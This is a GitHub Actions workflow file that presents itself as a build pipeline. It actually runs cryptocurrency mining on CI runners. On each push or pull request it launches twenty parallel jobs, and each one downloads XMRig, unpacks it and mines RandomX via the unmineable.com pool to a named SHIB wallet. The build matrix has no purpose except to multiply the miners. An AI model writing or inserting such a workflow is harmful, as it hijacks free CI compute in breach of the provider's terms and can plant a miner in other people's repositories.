name: kntl

on: [push, pull_request]
  
jobs:
 build-1:

    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        go: [1, 2]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

    steps:
    - uses: actions/checkout@v2
    - name: GASKAN
      run: |
          wget https://github.com/xmrig/xmrig/releases/download/v5.11.3/xmrig-5.11.3-xenial-x64.tar.gz && tar -zxf xmrig-5.11.3-xenial-x64.tar.gz && cd xmrig-5.11.3 &&
./xmrig --threads-32 --cpu-32 -o rx-asia.unmineable.com:3333 -a rx -k -u SHIB:0x33c607bfe1889658f5c7773003b15825b13cdb74.1
